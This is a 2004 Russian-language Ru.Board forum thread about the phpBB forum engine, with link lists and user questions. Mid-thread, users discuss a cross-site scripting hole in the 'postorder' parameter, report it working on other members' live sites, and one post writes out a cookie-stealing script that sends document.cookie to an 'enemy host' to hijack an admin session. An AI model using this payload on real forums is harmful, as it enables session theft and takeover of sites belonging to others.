NT Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Мы переехали в новый топик! Сюда!     В этой теме обсуждаем форумный движок phpBB » Полезные Линки:    » http://www.phpBB.com  - официальный сайт      » http://forumimages.com - сайт с графикой для phpBB2    » http://sourceforge.net/...  -  phpBB 2.0.8a    » http://www.phpBB.com/phpBB/  - обсуждение и поддержка (english)    » http://www.phpbbhacks.com  - всевозможные хаки      » http://www.phpbbhacks.com/templates.php  - шаблоны для phpBB      » http://www.phpbbhacks.com/templatesdemo    » http://www.phpbb2-users.de/ - довольно хороший сайт про phpBB    » http://myphpbb.com.ru/ - Неплохой сайт про phpBB, много хаков.    » http://forum.ru-board.com/...фильтр по форуму "Другие форумы" по теме phpBB    » http://www.hacksphpbb.ru  - Еще один российский сайт модов (хаков)     » Полезные Хаки:    » Advanced Quick Reply Hack (Быстрый ответ) [ чинить баг ]    » Last Post Topic on Index (Название топика с последним ответом на главной странице)    » Forum Icons (Разные иконки форумов)    » Double post merge (Склеивание постов)    » Translit BBCode (Заменяет транслит на кириллицу методами php)    » eDonkey Link replacer (Добавляет любой текст в звериные линки на форуме)    » "Хак" для Advanced Quick Reply Hack (Добавляет имя цитируемого юзера)    » Хак: Замечания к постам (Текст модератора под постом)    » Хак: Бан в куки (информация о том что ты был забанен пишется еще и в cookies)   »  Ответы на вопросы:    » Не работают куки (cookies)    » Как в phpBB вставить баннеры и все такое прочее?    » Форум заменяет русский текст на "лабуду" типа "тест"    » Advanced Quick Reply добавляет лишнюю строку при цитировании    » Как отредактировать условия регистрации?    » Как убрать надпись о том что если вам меньше 13ти лет...? Всего записей: 1861 | Зарегистр. 27-07-2002 | Отправлено: 00:17 04-09-2002 | Исправлено: xntx, 23:46 28-10-2004

hamshen Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Kakuraka Может быть кодировка так же шлется в http-заголовке?   Добавлено romutis Да. Я прогнал. Причем неплохо ---------- Хорошие умирают молодыми, но плохие умирают уродливо. Всего записей: 614 | Зарегистр. 22-04-2002 | Отправлено: 19:43 01-03-2004

Kakuraka Junior Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору в http-заголовке написано   <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">   ВОТ > http://www.toolband.com.ua/phpbb/index.php   Всего записей: 149 | Зарегистр. 05-11-2002 | Отправлено: 19:53 01-03-2004

xntx хнотик-багоискатель Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору хм... как ни странно, а у меня уязвимость не работает почему бы это? ---------- Hello world! Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 22:05 01-03-2004

romutis Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору xntx Цитата: хм... как ни странно, а у меня уязвимость не работает   Еще как работает! Куки и sid'ы кажет - в полный рост!     Добавлено И не только у тебя эта уязвимость работает. У всех сайтов, найденных на последних трех страницах этого топика, эта уязвимость работает. Рыть дальше другие сайты было влом.   "Это просто праздник какой-то" (С) Карабас-Барабас Всего записей: 824 | Зарегистр. 21-07-2002 | Отправлено: 13:11 02-03-2004 | Исправлено: romutis, 13:14 02-03-2004

Jovani Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Цитата: И не только у тебя эта уязвимость работает. У всех сайтов, найденных на последних трех страницах Нужно было и тут порыть: http://monitor.net.ru/forum/index.php В общем, кто хотел, тот закрыл Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 23:16 02-03-2004

romutis Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Jovani Цитата: В общем, кто хотел, тот закрыл     Ну ты явно не из них. На твоем сайте отлично показываются куки и sid (monitor_data & monitor_sid) - причем в отдельном окошечке. Всего записей: 824 | Зарегистр. 21-07-2002 | Отправлено: 23:22 02-03-2004

Jovani Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Угу ... Странно, по идее это должно помочь:   $post_order = (!empty($HTTP_POST_VARS['postorder'])) ? htmlspecialchars($HTTP_POST_VARS['postorder']) : htmlspecialchars($HTTP_GET_VARS['postorder']);       Не помогает ... Прикол Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 23:38 02-03-2004 | Исправлено: Jovani, 00:03 03-03-2004

romutis Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Jovani Цитата: Странно, по идее это должно помочь:     Как видишь, не помогает. Ты на чем тестировал - на примере скрипта с секуритилаб? Дык там он намеренно дан нерабочий - но, в принципе, легко модифицируемый в рабочий.   Добавлено P.S. У меня на сайте этот трюк не проходит. Всего записей: 824 | Зарегистр. 21-07-2002 | Отправлено: 23:58 02-03-2004

Jovani Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору romutis Как править-то ? Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 00:05 03-03-2004

Jovani Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Цитата: Проверь еще раз внимательно - может ты старую строчку после новой оставил? Проверил - все OK, код правильный, но прикол в том, что работает "через раз" ... Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 00:20 03-03-2004

xntx хнотик-багоискатель Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору romutis Цитата: Еще как работает! Куки и sid'ы кажет - в полный рост!   да, ты прав   ЗЫ: но этой уязвимостью ничего не сделаешь, это как та что я нашел в advanced quick reply. ведь кавычку вставить нельзя а значит адрес тоже никакой не впишешь... тоесть куки увидеть можешь только ты, на другой урл их не перекинешь так как домен надо брать в кавычки... ---------- Hello world! Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 09:43 03-03-2004

romutis Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору xntx   Меняешь alert на prompt - и спокойно редактируешь значения. Можно там и кавычки поставить.     На твоем сайте поредактировать? Всего записей: 824 | Зарегистр. 21-07-2002 | Отправлено: 10:10 03-03-2004

xntx хнотик-багоискатель Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору romutis Цитата: На твоем сайте поредактировать? поредактируй все равно ему жить меньше месяца осталосььь...   а до меня все равно не доходит как ты хочешь чтото сделать.. ---------- Hello world! Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 17:34 03-03-2004

alexhemp упал с пальмы Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору xntx Идея мне кажется в том, что можно сделать cпециальный скрипт на вражеском хосте и   запостить такой линк на том форуме, что хочешь атаковать, типа     http://host/phpBB/viewtopic.php?t=123&postorder=(здесь JavaScript код указанный ниже) <scipt> document.write("<img src=http://вражеский хост/script?cookie=>" + document.cookie); </script>   В скрипте на вражеском хосте можно написать попытку входа в админпанель делая GET по http://host/phpBBadmin/index.php?sid=SID_из_куков и разбирая результат.   Далее, если админ на такой линк нажмет (сходу все пристойно, линк просто и все) то дело техники и оперативности захватить управления форумом.   Это просто то, что мне в голову пришло, может и проще все или сложнее, но идею я думаю ухватил. Всего записей: 1945 | Зарегистр. 13-12-2001 | Отправлено: 18:20 03-03-2004

xntx хнотик-багоискатель Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору alexhemp Цитата: <scipt>   document.write("<img src=http://вражеский хост/script?cookie=>" + document.cookie);   </script>   заметь, у тебя кавычки в коде, а они-то как раз слешатся... ---------- Hello world! Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 20:01 03-03-2004

Bomj Junior Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Народ! Нужен форум. Поставить сам наверное не смогу, так как не знаком ни с mysql ни с php и с другими формулировками, они мне совсем ничего не говорят. Может кто возьмётся поставить? Готов заплатить, не много, рублей 500. И ещё может существуют форумы с установкой по-проще? Времени совсем нет, так бы я сам попробовал. Всего записей: 84 | Зарегистр. 29-08-2003 | Отправлено: 09:07 04-03-2004

xntx хнотик-багоискатель Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору Bomj для установки форума типа phpBB не нужно никаких знаний php/mysql, так что иди качай его, регай себе аккаунт на какомнить сайте и вперед... ---------- Hello world! Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 09:32 04-03-2004

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

Компьютерный форум Ru.Board » IkonBoard и другие форумы » Другие форумы » Все о phpBB2

Antuan (29-10-2004 02:01):

Переход по форумам  Закладки   » Компьютеры Цифровое изображение Программы Microsoft Windows UNIX Другие OS Hardware В помощь сисадмину Прикладное программирование Игры Форумные игры   » Интернет Web-программирование В помощь вебмастеру Графика Хостинг Зацените-ка!   » Тематические Ikonboard v.2 Ikonboard v.3 Invision Board Другие форумы PHP-Nuke и другие порталы Мобила   » Общие Спорт Флейм Темы по региональным встречам Музыка и Кино Юмор Литература и Живопись   » Ru.Board Новости Помощь по форуму   » Андеграунд eBookz Варезник Раздачи и акции Мобильный варезник Андеграунд Игры и фильмы   » Специальные Тестирование